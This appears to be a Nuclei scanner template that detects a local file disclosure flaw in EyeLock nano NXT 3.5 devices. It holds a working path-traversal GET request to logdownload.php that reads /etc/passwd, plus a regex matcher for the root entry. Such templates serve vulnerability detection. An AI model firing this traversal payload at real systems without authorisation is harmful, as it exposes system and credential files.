25 lines
802 B
YAML
25 lines
802 B
YAML
id: eyelock-nano-lfd
|
|
|
|
info:
|
|
name: EyeLock nano NXT 3.5 - Local File Disclosure
|
|
author: geeknik
|
|
severity: high
|
|
description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
|
|
reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt
|
|
tags: iot,lfi,eyelock
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|